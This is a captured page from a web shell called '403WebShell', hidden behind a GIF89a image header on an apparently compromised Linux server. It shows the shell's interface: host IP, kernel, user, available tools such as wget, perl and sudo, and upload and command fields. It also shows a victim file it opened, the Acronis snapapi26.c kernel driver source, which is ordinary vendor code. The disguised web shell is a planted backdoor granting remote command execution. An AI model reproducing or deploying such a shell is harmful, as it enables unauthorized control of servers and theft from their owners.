GIF89a=( �' 7IAXKgNgYvYx\%wh&h}t�h%�s%x�}9�R��&�0%� (�.��5�SD��&�a)�x5��;ͣ*ȡ&ղ)ׯ7׵<ѻ4�3�H֧KͯT��Y�aq��q��F� !� ' !� NETSCAPE2.0 , =( ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g���E�������R���E����B�� ��ȸ��D���"�Ů� �H��L��D٫D�B�����D���T���H �G��A R�ڐ |�� ٭&��E8�S�kG�A�px�a��� R2XB��E8I���6X�:vT)�~��q�賥��"F~%x� � 4#Z�0O|-4Bs�X:= Q� Sal��yXJ`GȦ|s h��K3l7�B|�$'7Jީܪ0!��D�n=�P� ����0`�R�lj����v>���5 �.69�ϸd�����nlv�9��f{���Pbx �l5}�p� ��� �3a���I�O����!ܾ���i��9��#��)p�a ޽ �{�)vm��%D~ 6f��s}Œ�D�W E�`!� �&L8x� �ܝ{)x`X/>�}m��R�*|`D�=�_ ^�5 !_&'a�O�7�c��`DCx`�¥�9�Y�F���`?��"� �n@`�} lď��@4>�d S �v�xN��"@~d��=�g�s~G��� ���ud &p8Q�)ƫlXD����A~H�ySun�j���k*D�LH�] ��C"J��Xb~ʪwSt}6K,��q�S:9ت:���l�@�`�� �.۬�t9�S�[:��=`9N����{¿�A !R�:���6��x�0�_ �;������^���#����!����U���;0L1�����p% A��U̬ݵ��%�S��!���~`�G���� ���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5� ���^`8E�]�.�S���7 � �0�j S�D� z���i�S�����!���l��w9*�D�I�nEX��� &A�Go�Qf��F��;���}�J����F5��Q|���X��T��y���]� o ��C=��:���PB@ D׽S�(>�C�x}`��xJЬ�۠��p+eE0`�}`A �/NE�� �9@��� H�7�!%B0`�l*��!8 2�%� �:�1�0E��ux%nP1�!�C)�P81l�ɸF#Ƭ{����B0>�� �b�`��O3��()yRpb��E.ZD8�H@% �Rx+%���c� ���f��b�d�`F�"8�XH"��-�|1�6iI, 2�$+](A*j� QT�o0.�U�`�R�}`�SN����yae�����b��o~ S)�y�@��3 �tT�0�&�+~L�f"�-|�~��>!�v��~�\Q1)}@�}h#aP72�"�$ !� " , =( &7IAXG]KgNgYvYxR"k\%w]'}h}t�h%�g+�s%r.m3ax3�x�}9��&��+�!7�0%� (�.�SD��&��;�"&ײ)׻4��6�K� �@pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E �� �������E �´��C���ǶR��D��"Ʒ�ʱH��M��GڬD�B����D��T����G���C�C� l&�~:'�tU�6ɹ#��)�'�.6�&��Ȼ K(8p0N�?!�2"��NIJX>R��OM '��2�*x�>#n� �@<[:�I�f ��T���Cdb��[�}E�5MBo��@�`@��tW-3 �x�B���jI�&E�9[T&$��ﯧ&"s��ȳ����dc�UUρ#���ldj?����`\}���u|3'�R]�6 �S#�!�FKL�*N E���`$�:e�YD�q�.�촁�s \-�jA 9�����-��M[�x(�s��x�|���p��}k�T�DpE@W� ��]k`1� ���Yb ��0l��*n0��"~zBd�~u�7�0Bl��0-�x~|U�U0 �h�*HS�|��e"#"?vp�i`e6^�+q��`m8 #V�� ��VS|`��"m"сSn|@:U���~`pb�G�ED����2F�I�? >�x� R� ��%~jx��<�a�9ij�2�D��&: Z`�]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ܺN���>PAD�HD��~���n��}�#�� Q��S���2�X�{�k�lQ�2�����w�|2� h9��G�,m���3��6-��E�L��I�³*K���q�`DwV�QXS��peS��� qܧTS����R�u �<�a�*At�lmE� � ��N[P1�ۦ��$��@`��Dpy�yXvCAy�B`}D� 0QwG#� �a[^�� $���Ǧ{L�"[��K�g�;�S~��GX.�goT.��ư��x���?1z��x~:�g�|�L� ��S`��0S]P�^p F<""�?!,�!N4&P� ����:T�@h�9%t��:�-~�I<`�9p I&.)^ 40D#p@�j4�ج:�01��rܼF2oW�#Z ;$Q q  �K��Nl#29 !F@�Bh�ᏬL!XF�LHKh�.�hE&J�G��<"WN!�����Y@� >R~19J"�2,/ &.GXB%�R�9B6�W]���W�I�$��9�RE8Y� ��"�A5�Q.axB�&ة�J�! �t)K%tS-�JF b�NMxL��)�R��"���6O!TH�H� 0 !� ) , =( &AXKgNgYvYxR"k\%wh&h}h%�g+�s%r.x3�x�}9��&��+�R,�!7�0%� (�.��5��&�a)��;�"&ף*Ȳ)ׯ7׻4�3��6�H֧KͻH�T��Y��q��h� ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E$����� � ����$E$��"��D� � ������R��C��� E ��H�M��G�D� �B��ϾD��a��`1r��Ӑ�� �o~�zU!L�C'�yW�UGt����ll�0���uG�)A�s[��x� �xO%��X2�  P�n:R/��aHae+�Dm?# ǣ6�8�J�x�Di�M���j���5oQ7�- <! *�l��R2r/a!l)d� A"�E���� &� ;��c �%����b��pe~C"B���H�eF2��`8qb�t_`ur`e� w�u3��Pv�h""�`�Íx�LĹ��3� �~ֺ�:���MDfJ� �۵�W�%�S�X �؁)�@��:E��w�u�Sxb8y\m�zS��Zb�E�L��w!y(>�"w�=�|��s�d �C�W)H�cC$�L �7r.�\{)@�`@ �X�$PD `aaG:���O�72E�amn]�"Rc�x�R� &dR8`g��i�xLR!�P &d����T���i�|�_ � Qi�#�`g:��:noM� :V �)p����W&a=�e�k� j���1߲s�x�W�jal|0��B0�, \j۴:6���C ��W��|��9���zĸV {�;��n��V�m�I��.��PN� ����C��+��By�ѾHŸ:��� 7�Y�FTk�SaoaY$D�S���29R�kt� ��f� ��:��Sp�3�I��DZ� �9���g��u�*3)O��[_hv ,���Et x�BH� �[��64M@�S�M7d�l�ܶ5-��U܍��z�R3Ԭ3~ ��P��5�g: ���kN�&0�j4���#{��3S�2�K�'ợl���2K{� {۶?~m𸧠�I�nE�='����^���_�=��~�#O���'���o..�Y�n��CSO��a��K��o,���b�����{�C�� "�{�K ��w��Ozdը�:$ ���v�] A#� ���a�z)Rx׿ƥ�d``�w-�y�f�K!����|��P��=�`�(f��'Pa ��BJa%��f�%`�}F����6>��`G"�}�=�!o`�^FP�ةQ�C���`(�}\�ݮ ��$<��n@dĠE#��U�I�!� #l��9`k���'Rr��Z�NB�MF �[�+9���-�wj���8�r� ,V�h"�|�S=�G_��"E� 0i*%̲��da0mVk�):;&6p>�jK ��# �D�:�c?:R Ӭf��I-�"�<�="��7�3S��c2RW ,�8(T"P0F¡Jh�" ; 403WebShell
403Webshell
Server IP : 173.249.157.85  /  Your IP : 18.191.28.190
Web Server : Apache
System : Linux server.frogzhost.com 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
User : econtech ( 1005)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/lib/dkms/snapapi26/0.8.34/source/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dkms/snapapi26/0.8.34/source/snapapi26.c
/* snapapi.c
   Copyright (C) Acronis, 2004
   Written by Vladimir Simonov
   $Id: snapapi26.c 1262030 2018-01-11 12:33:11Z marina $
*/
#include "kernel_config.h"
#ifdef HAVE_LINUX_CONFIG
#include <linux/config.h>
#elif defined(HAVE_LINUX_AUTOCONF)
#include <linux/autoconf.h>
#elif defined(HAVE_GENERATED_AUTOCONF)
#include <generated/autoconf.h>
#else
#warning "neither linux/config.h nor linux/autoconf.h or generated/autoconf.h found"
#endif
#ifdef HAVE_SCHED_SIGNAL_H
#include <linux/sched/signal.h>
#endif
#ifdef HAVE_BLK_CGROUP_H
#include <linux/blk-cgroup.h>
#endif
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/kernel.h>
#include <linux/version.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/file.h>
#include <linux/kthread.h>
#include <asm/div64.h>

#include <linux/fs.h>

#include <linux/init.h>

#if LINUX_VERSION_CODE < KERNEL_VERSION(3,4,0)
#include <asm/system.h>
#endif
#include <asm/uaccess.h>
#include <asm/bitops.h>
#include <linux/mm.h>
#include <linux/highmem.h>
#include <linux/slab.h>
#include <linux/smp.h>

#include <linux/bio.h>
#include <linux/blkdev.h>
#include <linux/buffer_head.h>
#include <linux/interrupt.h> /* for in_interrupt */
#include <linux/poll.h>
#include <linux/timer.h>
#ifdef HAVE_IOCTL32_CONVERSIONS
#include <linux/ioctl32.h>
#endif
#ifdef HAVE_FREEZER_H
#include <linux/freezer.h>
#endif
#if defined(CONFIG_VZ_VZSNAP) || defined(CONFIG_VZ_VZSNAP_MODULE)
#define USE_VZ_VZSNAP
#include <linux/vzsnap.h>
#endif
#ifdef HAVE_PART_STAT_H
#include <linux/part_stat.h>
#endif
#ifdef HAVE_BLK_MQ_MAKE_REQUEST
#include <linux/blk-mq.h>
#endif

#include "snapapi.h"

#define DEBUG		0

#define DEBUG_API	(1 << 1)
#define DEBUG_ALLOC	(1 << 2)
#define DEBUG_BIO	(1 << 3)
#define DEBUG_BIOQUE	(1 << 4)
#define DEBUG_CACHE	(1 << 5)
#define DEBUG_BREAD	(1 << 6)
#define DEBUG_INTERNALS	(1 << 7)
#define DEBUG_DUMP	(1 << 8)
#define DEBUG_LOCK	(1 << 9)
#define DEBUG_IOCTL	(1 << 10)
#define DEBUG_MESS	(1 << 11)
#define DEBUG_BMAP	(1 << 12)

#define DEBUG_LEVEL 	(DEBUG_API)

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,23)
#define sn_request_queue request_queue_t
#define sn_kmem_cache kmem_cache_t
#else
#define sn_request_queue struct request_queue
#define sn_kmem_cache struct kmem_cache
#endif

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,24)
#define sn_bio_io_error(x) bio_io_error(x, sn_bio_bi_size(x))
#define BIO_EIO_RET_VAL_ERR 1
#define BIO_EIO_RET_VAL_OK 0
#else
#define sn_bio_io_error(x) bio_io_error(x)
#define BIO_EIO_RET_VAL_ERR
#define BIO_EIO_RET_VAL_OK
#endif

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,7)
#define USE_KERNEL_THREAD
#endif

#ifdef HAVE_KMAP_ATOMIC_2ARGS
#define sn_kmap_atomic(a) kmap_atomic(a, KM_USER0)
#define sn_kunmap_atomic(a) kunmap_atomic(a, KM_USER0)
#else
#define sn_kmap_atomic(a) kmap_atomic(a)
#define sn_kunmap_atomic(a) kunmap_atomic(a)
#endif

#ifdef HAVE_ASM_HAVE_SET_MB
#define sn_set_mb set_mb
#else
#define sn_set_mb smp_store_mb
#endif

#ifdef HAVE_VM_FAULT_2ARGS
#define snapapi_vm_fault(a, b) snapapi_vm_fault(a, b)
#else
#define snapapi_vm_fault(a, b) snapapi_vm_fault(b)
#endif

#ifdef HAVE_SYNC_BLOCKDEV
#define sn_fsync_bdev sync_blockdev
#else
#define sn_fsync_bdev fsync_bdev
#endif


#ifdef HAVE_VMFAULT_T
#define VMFAULT_RETURN_VALUE vm_fault_t
#else
#define VMFAULT_RETURN_VALUE int
#endif

#ifndef HAVE_REQ_WRITE
#define REQ_WRITE	(1 << BIO_RW)
#endif

#ifndef HAVE_FMODE_T
typedef unsigned int fmode_t;
#endif

#if DEBUG
#define inline
#define sa_debug(level, fmt, arg...)					\
	do {								\
		static const char *func = __FUNCTION__;			\
		if ((level) & DEBUG_LEVEL)				\
			printk(KERN_DEBUG "%s(%s,%d): " fmt, func,	\
				current->comm, current->pid, ##arg);	\
	} while (0)
#else
#define sa_debug(fmt,arg...) do { } while (0)
#endif

#define sa_kdebug(fmt, arg...)					\
	do {							\
		static const char *func= __FUNCTION__;		\
		printk(KERN_DEBUG "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)
#define sa_info(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_INFO "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)
#define sa_warn(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_WARNING "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)
#define sa_error(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_ERR "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
	} while (0)

#define sa_BUG(fmt, arg...)					\
	do {							\
		static const char *func = __FUNCTION__;		\
		printk(KERN_CRIT "%s(%s,%d): " fmt, func,	\
			current->comm, current->pid, ##arg);	\
		BUG();						\
	} while (0)

#if defined(__x86_64) && defined(HAVE_IOCTL32_H) && defined(CONFIG_COMPAT) && !defined(HAVE_COMPAT_IOCTL)
#define HAVE_IOCTL32_CONVERSION
#endif

#ifdef HAVE_BD_SUPER
#define sn_get_super(bdev) (bdev)->bd_super
#define sn_drop_super(sb)
#elif defined(HAVE_BD_HOLDER)
#define sn_get_super(bdev) ((bdev)->bd_holder_ops ? (bdev)->bd_holder : 0)
#define sn_drop_super(sb)
#else
#define sn_get_super(bdev) get_super(bdev)
#define sn_drop_super(sb) drop_super(sb)
#endif

#if defined (HAVE_BDOPS_SUBMIT_BIO_BLK_QC_T) || defined(HAVE_BDOPS_SUBMIT_BIO_VOID)
#define HAVE_BDOPS_SUBMIT_BIO 1
#endif

#ifdef HAVE_BDOPS_SUBMIT_BIO
#include <linux/utsname.h>
#include <generated/utsrelease.h>
#define generic_make_request submit_bio_noacct
#ifdef HAVE_BDOPS_SUBMIT_BIO_VOID
#define MAKE_REQUEST_RETURN_VALUE void
#define MAKE_REQUEST_EXIT_STATUS
#else
#define MAKE_REQUEST_RETURN_VALUE blk_qc_t
#define MAKE_REQUEST_EXIT_STATUS 0
#endif
typedef MAKE_REQUEST_RETURN_VALUE (make_request_fn) (struct bio *bio);
#if defined(CONFIG_X86)
// page protection hack
#ifndef X86_CR0_WP
#define X86_CR0_WP (1UL << 16)
#endif
static inline void wp_cr0(unsigned long cr0)
{
	__asm__ __volatile__ ("mov %0, %%cr0": "+r"(cr0));
}

static inline unsigned long disable_page_protection(void )
{
	unsigned long cr0;
	cr0 = read_cr0();
	wp_cr0(cr0 & ~X86_CR0_WP);
	return cr0;
}

static inline void reenable_page_protection(unsigned long cr0)
{
	wp_cr0(cr0);
}

static inline void snapapi_set_submit_bio_fn(struct block_device *bdev, make_request_fn *fn)
{
	unsigned long cr0;

	preempt_disable();
	cr0 = disable_page_protection();
	sa_debug(DEBUG_API, " Replacing original fops->submit_bio %p for disk %s", bdev->bd_disk->fops->submit_bio, bdev->bd_disk->disk_name);
	((struct block_device_operations *)bdev->bd_disk->fops)->submit_bio = fn;
	sa_debug(DEBUG_API, "with new  %p\n", bdev->bd_disk->fops->submit_bio);
	reenable_page_protection(cr0);
	preempt_enable();
}

#else
#pragma message("Page protection unimplemented for current architecture")
#endif
#endif

#ifndef HAVE_BDOPS_SUBMIT_BIO
#ifdef HAVE_MAKE_REQUEST_INT
#define MAKE_REQUEST_EXIT_STATUS 0
#define MAKE_REQUEST_RETURN_VALUE int
#elif defined(HAVE_MAKE_REQUEST_BLK_QC_T)
#define MAKE_REQUEST_EXIT_STATUS 0
#define MAKE_REQUEST_RETURN_VALUE blk_qc_t
#else
#define MAKE_REQUEST_EXIT_STATUS
#define MAKE_REQUEST_RETURN_VALUE void
#endif
#endif

#ifdef HAVE_BLKDEV_PUT_INT
#define MAKE_BLKDEV_RETURN_VALUE int
#else
#define MAKE_BLKDEV_RETURN_VALUE void
#endif

#ifndef HAVE_PAGE_CACHE_RELEASE
#define page_cache_release(page) put_page(page)
#endif

static int snap_init_ok;
static int snapctl_major;
static int snap_emergency_size;
static struct vm_operations_struct snapctl_vm_ops;

static wait_queue_head_t select_wait;
static int messages_pos;
#define MESSAGE_SIZE (sizeof(struct snap_message))
#define MAX_MESSAGES (PAGE_SIZE / MESSAGE_SIZE)
struct snap_message *messages_buf;
static struct semaphore messages_sem = __SEMAPHORE_INITIALIZER(messages_sem, 1);

#ifndef USE_KERNEL_THREAD
static struct task_struct *resolver_thread;
#else
#include <linux/smp_lock.h>
static pid_t resolver_thread_pid;
static wait_queue_head_t resolver_thread_signal;
#endif

static int resolver_thread_continue = 1;
static DECLARE_COMPLETION(resolver_thread_exited);

static LIST_HEAD(sessions_list);
static LIST_HEAD(notinited_list);

#define sn_round(a,b) (((a) + (b) - 1) / (b))

/* sessions_list, noninit_sessions_list and pid_info_p protection */
#ifdef HAVE_SPIN_LOCK_UNLOCKED
static spinlock_t sessions_lock = SPIN_LOCK_UNLOCKED;
#else
static DEFINE_SPINLOCK(sessions_lock);
#endif
static  atomic_t slab_uid = ATOMIC_INIT(0);

#define REFS_PER_PAGE	(PAGE_SIZE / (sizeof(void *)))
#define REFS_PER_PAGE_MASK (~(REFS_PER_PAGE - 1))
#if BITS_PER_LONG == 32
#define REFS_PER_PAGE_SHIFT (PAGE_SHIFT - 2)
#elif BITS_PER_LONG == 64
#define REFS_PER_PAGE_SHIFT (PAGE_SHIFT - 3)
#else
#error Unsupported architecture detected
#endif

#define MAX_BHPAGES	REFS_PER_PAGE
#define MAX_BH_DELAYED	(REFS_PER_PAGE * MAX_BHPAGES)

struct block_map {
	unsigned long long	size; /* size in bits of allocated memory */
	unsigned long long	rsize; /* size in bits of real data */
	struct page **		blkmap;
};

#ifdef __GFP_HIGHIO
#define GFP_SNAPHIGH	(__GFP_IO | __GFP_HIGHIO | __GFP_FS | __GFP_HIGHMEM)
#else
#define GFP_SNAPHIGH	(__GFP_IO | __GFP_FS | __GFP_HIGHMEM)
#endif
struct sa_page {
	struct sa_page *	next;
	struct page *		page;
	unsigned long long	bno;
};

struct sa_chain {
	struct sa_page *	busy;
	struct sa_page *	free;
	spinlock_t		lock;
#define FAKE_READ	1
#define READ_KERNEL1	2
#define READ_KERNEL2	3
};

#ifndef BIO_MAX_PAGES
#define BIO_MAX_PAGES 256
#endif
#define MAX_MMPAGES 64
#define MAX_RDPAGES BIO_MAX_PAGES
#define MEM_ALLOC_TM 5	/* memory allocation timeout ms */
#define TIMER_INTERVAL (5*HZ)
#define IOCTL_SIM_INTERVAL (1*HZ) /* ioctl simulate interval */

struct bio_req {
	struct bio *bio;
	struct completion event;
};

struct pending_request;
struct pending_queue {
	spinlock_t		pq_lock;
	struct pending_request	*pq_req;	/* pending request list head */
	struct pending_request	*pq_reqtail;	/* pending request list tail */
	int			pq_state;
	struct completion	pq_done;
	struct completion	pq_bio_done;	/* end_io signal */
	atomic_t		pq_ready_req;	/* number of ready requests */
	atomic_t		pq_notready_req;
};

enum  pending_queue_states {
	PQ_STOPPED,	/* Where is no any unhandled pending requests */
	PQ_RUNNING,	/* New requests may be pushed to queue */
	PQ_CLOSED,	/* New requests can't be pushed to queue, but old
			 * requests may stil unfinished */
};

struct pending_read_request {
	/*
	 * While rbio handling it may be remapped, this result in loosing
	 * information about initial request so we have to explicytly
	 * save rbio block number.
	 */
	unsigned long long	rblkno;	/* first rbio block */
	struct bio		*rbio;	/* bio to read */
};

struct pending_request {
	struct pending_request 	*pr_next;	/* pendnig requests list */
	struct bio		*pr_wbio;	/* original delayed bio */
	struct pending_queue	*pr_queue;	/* session delayed queue */
	int			pr_count;	/* read bios requests count */
	int			pr_ready;	/* ready count */
	struct pending_read_request	pr_bios[1]; /* bios to read */
};

struct level_entry {
	unsigned long long max_key;
	struct page* page;
};

struct stack_entry {
	struct page* page;
	struct level_entry* entry;
	unsigned long long max_key;
};

struct group_map {
	unsigned level;
	struct page* root;
	unsigned long long max_key;
	struct stack_entry stack[8];
};

struct sn_pid_info {
	pid_t sn_pid; 		/* pid */
	atomic_t sn_refs; 	/* reference count */
	atomic_t sn_ioctls;	/* ioctls counter */
};

#define MAX_PID_INFO (PAGE_SIZE / sizeof(struct sn_pid_info))
/* pid_info_p entries are protected by sessions_lock */
static struct sn_pid_info* pid_info_p;

/* 64 pages - ~11000 chains, memory size 256 Kb */
#define BLK_CHAINS_PAGES 64

struct session_struct {
	struct list_head	s_list;
	dev_t			s_kdev;
	struct block_device *	s_bdev;
	void*			s_bdev_container;
	volatile unsigned int	s_state;
	unsigned int		s_bppage;	/* blocks per page */
	unsigned int		s_bsize;	/* block size */
	unsigned int		s_spb;		/* secs per block */
	unsigned int		s_spbshift;	/* secs per block shift */
	unsigned long long	s_plen;
	unsigned long long	s_pstart;
	struct super_block *	s_sb;

	unsigned long long	s_fblock;	/* EXTxx: first data block */
	unsigned long		s_gcount;	/* group count */
	unsigned int		s_bpgroup;	/* blocks per group */

	atomic_t		s_users;
	struct block_map	s_blkmap;
#ifdef CATCH_ILLEGAL_ACCESS
	struct block_map	s_blkmap_backup;
#endif
	struct group_map	s_groupmap;
	int			s_usemap;
	unsigned long long 	s_bmsize;

#ifdef USE_VZ_VZSNAP
	struct vzsnap_struct *	s_vzs;
#endif

	int 			s_mess_pos;	/* last read message */
	spinlock_t		s_misc_lock;	/* protects from here to */
						/* s_make_request_fn */
	int			s_ioctlcnt;	/* state data */
	int			s_ioctlcnt_prev;
	struct sn_pid_info *	s_pid_info;	/* pid owning the session */
	unsigned long		s_simulate_tm;	/* next time to simulate ioctl */
	int			s_heartbeat_active;
	struct timer_list 	s_timer;	/* heartbeat in frozen*/

	make_request_fn *	s_make_request_fn; /* original fn from queue */
	int			s_queue_mq_based; /* 1 if queue is mq-based (requests should be dispatched via blk_mq_make_request)*/
	sn_request_queue *	s_request_queue;

	spinlock_t		s_biolist_lock;
	struct bio ***		s_bioarr;
	int			s_biopages;
	int			s_biocount;

	struct vm_area_struct *	s_vma;
	atomic_t		s_vma_users;
	int			s_msize;	/* vm area pages */
	int			s_maxmsize;	/* max vm area pages */
	struct page *		s_mpages[MAX_MMPAGES];	/* mmapped pages */
	struct bio_req *	s_local_bios;	/* space exchange */
	unsigned long long	s_ahead_bno;	/* start ahead buffer */
	unsigned int		s_asize;

	struct semaphore        s_sem;		/* user space requests
						   serialization */
	struct pending_queue	s_pending_queue;/* pending request queue used
						   by async handler */

	sn_kmem_cache *		s_blkcachep;
	char			s_blkcachename[64];
	int 			s_blkcache_pages;
	spinlock_t		s_blkcache_emlock;
	int	 		s_blkcache_empages;
	int	 		s_blkcache_emmin;
	struct sa_page *	s_blk_emlist;
	int			s_veid;
	int			s_simulate_freeze;	/* disable freeze */
	int			s_anyblk_chain;		/* first chain to be searched by next any_block_in_cache() */

	spinlock_t		s_stat_lock;	/* protects from here to s_abios */
	const char*		pref_gpages;
	const char*		pref_ppages;
	unsigned long long	s_gpages;	/* got pages */
	unsigned long long	s_ppages;	/* put pages */
	unsigned long long	s_abios;	/* allocated bios */
	unsigned long long	s_fbios;	/* freed bhs */
	unsigned long long	s_dbios;	/* delayed bhs */
	unsigned long long	s_rblocks;	/* read blocks */
	unsigned long long	s_cblocks;	/* cached blocks */
	unsigned long long	s_rcblocks;	/* read from cache */
	unsigned long long	s_fcblocks;	/* freed cache  blocks */
	unsigned long long	s_mcblocks;	/* max blocks in cache */
	unsigned long long	s_rwcolls;	/* read/write collisions */
	unsigned long long	s_rc2blocks;	/* read to cache2 blocks */
	unsigned int s_sync_req;		/* sync requests  */
	unsigned int s_mipr;		/* max increase pending requests */
	unsigned int s_async_req;	/* async requests  */
	unsigned int s_iprcnt;		/* increase pending requests count */
	unsigned int s_async_retr;	/* async retries */
	unsigned int s_mbio;  		/* min bio size */
	unsigned long long s_rccalls;	/* total number of searches in blkcache (sa_cache_chain_read calls) */
	unsigned long long s_maxrcdepth;	/* length of the deepest search in single blkcache chain */
	unsigned long long s_rcdepthcnt[4];	/* total counts of blkcache searches with depth > SNAP_RCDEPTHi */

	struct page*		s_blkchains_pages[BLK_CHAINS_PAGES];
};

static inline void inc_get_pages(struct session_struct* s)
{
	spin_lock(&s->s_stat_lock);
	s->s_gpages++;
	spin_unlock(&s->s_stat_lock);
}

static inline unsigned long long read_get_pages(struct session_struct* s)
{
	unsigned long long ret;
	spin_lock(&s->s_stat_lock);
	ret = s->s_gpages;
	spin_unlock(&s->s_stat_lock);
	return ret;
}

static inline void inc_put_pages(struct session_struct* s)
{
	spin_lock(&s->s_stat_lock);
	s->s_ppages++;
	spin_unlock(&s->s_stat_lock);
}

static inline unsigned long long read_put_pages(struct session_struct* s)
{
	unsigned long long ret;
	spin_lock(&s->s_stat_lock);
	ret = s->s_ppages;
	spin_unlock(&s->s_stat_lock);
	return ret;
}

#define BLK_CHAINS_PER_PAGE (PAGE_SIZE / sizeof(struct sa_chain))
#define BLK_CHAINS (BLK_CHAINS_PAGES * BLK_CHAINS_PER_PAGE)

static inline int sa_get_blk_chain_index(unsigned long long num)
{
	int ret = do_div(num, (unsigned)BLK_CHAINS);

	return ret;
}

static inline struct sa_chain* sa_get_blk_chain(struct session_struct* s, unsigned long long num)
{
	unsigned index;
	unsigned page_no;
	unsigned no_on_page;
	struct sa_chain* chain;

	index = do_div(num, (unsigned)BLK_CHAINS);
	no_on_page = index % (unsigned)BLK_CHAINS_PER_PAGE;
	page_no = index / (unsigned)BLK_CHAINS_PER_PAGE;
	chain = (struct sa_chain*) page_address(s->s_blkchains_pages[page_no]);

	return &chain[no_on_page];
}

static noinline void sa_blkchains_destroy(struct session_struct *s)
{
	int i;

	for (i = 0; i < BLK_CHAINS_PAGES; i++) {
		struct page * page;
		page = s->s_blkchains_pages[i];
		if (page) {
			page_cache_release(page);
			inc_put_pages(s);
			s->s_blkchains_pages[i] = NULL;
		}
	}
}

static noinline int sa_blkchains_init(struct session_struct *s)
{
	struct page *pg;
	int ret, i;

	ret = -ENOMEM;
	for (i = 0; i < BLK_CHAINS_PAGES; i++) {
		int j;
		struct sa_chain* chain;

		pg = alloc_page(GFP_KERNEL);
		if (unlikely(!pg)) {
			goto out;
		}

		inc_get_pages(s);
		chain = (struct sa_chain*) page_address(pg);
		memset(chain, 0, PAGE_SIZE);

		for (j = 0; j < BLK_CHAINS_PER_PAGE; j++, chain++)
			spin_lock_init(&chain->lock);

		s->s_blkchains_pages[i] = pg;
	}

	ret = 0;

out:
	return ret;
}

static inline sector_t sn_bio_bi_sector(struct bio *bio)
{
#ifdef HAVE_BVEC_ITER
	return bio->bi_iter.bi_sector;
#else
	return bio->bi_sector;
#endif
}

static inline unsigned int sn_bio_bi_size(struct bio *bio)
{
#ifdef HAVE_BVEC_ITER
	return bio->bi_iter.bi_size;
#else
	return bio->bi_size;
#endif
}

static void destroy_cached_bio(struct session_struct* s, struct bio *bio);
static void noinline destroy_pending_request(struct session_struct *s,
					struct pending_request *preq)
{
	int i;

	if (!preq)
		return;

	for (i = 0; i < preq->pr_count; i++) {
		if (preq->pr_bios[i].rbio)
			destroy_cached_bio(s, preq->pr_bios[i].rbio);
	}
	kfree(preq);
}

#define snapapi_get_dev_queue(s) bdev_get_queue(s->s_bdev)
#define snapapi_lock_dev_queue(q) do { \
		if (q->queue_lock) \
			spin_lock_irq(q->queue_lock); \
	} while (0)
#define snapapi_unlock_dev_queue(q) do { \
		if (q->queue_lock) \
			spin_unlock_irq(q->queue_lock); \
		} while (0)


struct locked_dev {
	struct block_device *bdev;
	void *bdev_container;
	dev_t dev;
	unsigned lock_type;
	struct session_struct *sess;
};

#define MAX_LOCKEDDEVS (PAGE_SIZE / sizeof(struct locked_dev))
static int lockedcnt; /* global lock/unlock devs */
static struct locked_dev * devlocked;
/* devlocked & lockedcnt protection */
static struct semaphore devlocked_sem = __SEMAPHORE_INITIALIZER(devlocked_sem, 1);

static void unregister_make_request(struct session_struct * s);
static void mpages_destroy(struct session_struct *s);
static void close_session(struct session_struct *s, int do_free);
#if 0
static void dump_sessions(void);
#endif

#ifdef HAVE_TRY_TO_FREEZE_NO_ARGS
#define snapapi_try_to_freeze() try_to_freeze()
#elif defined(HAVE_TRY_TO_FREEZE_ONE_ARG)
#define snapapi_try_to_freeze() try_to_freeze(PF_FREEZE)
#else
#define snapapi_try_to_freeze()
#endif

#if !defined(HAVE_FREEZE_BDEV) && !defined(HAVE_BDEV_FREEZE)
static struct super_block *freeze_bdev(struct block_device *bdev)
{
	struct super_block *sb;

	sb = sn_get_super(bdev);
	if (sb) {
		if (sb->s_op->write_super_lockfs)
			sb->s_op->write_super_lockfs(sb);
	}
	sync_blockdev(bdev);
	return sb;
}

static void thaw_bdev(struct block_device *bdev, struct super_block *sb)
{
	if (sb) {
		if (sb->s_op->unlockfs)
			sb->s_op->unlockfs(sb);
		sn_drop_super(sb);
	}
}
#endif

static void sn_freeze_bdev(struct session_struct *s)
{
	if (!s->s_simulate_freeze) {
#ifdef HAVE_FREEZE_BDEV_INT
		int ret = 0;
		ret = freeze_bdev(s->s_bdev);
		if (ret) {
			sa_warn("freeze_bdev error");
		}
		s->s_sb = s->s_bdev->bd_fsfreeze_sb;
#elif defined(HAVE_BDEV_FREEZE)
		int ret = 0;
		ret = bdev_freeze(s->s_bdev);
		if (ret) {
			sa_warn("bdev_freeze error");
		}
		s->s_sb = sn_get_super(s->s_bdev);
#else
		s->s_sb = freeze_bdev(s->s_bdev);
#endif
	} else {
		sn_fsync_bdev(s->s_bdev);
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
		s->s_sb = sn_get_super(s->s_bdev);
#else
		s->s_sb = user_get_super(s->s_kdev);
#endif
	}
}

static void sn_thaw_bdev(struct session_struct *s)
{
	if (!s->s_simulate_freeze) {
#ifdef HAVE_THAW_BDEV_2ARGS
		thaw_bdev(s->s_bdev, s->s_sb);
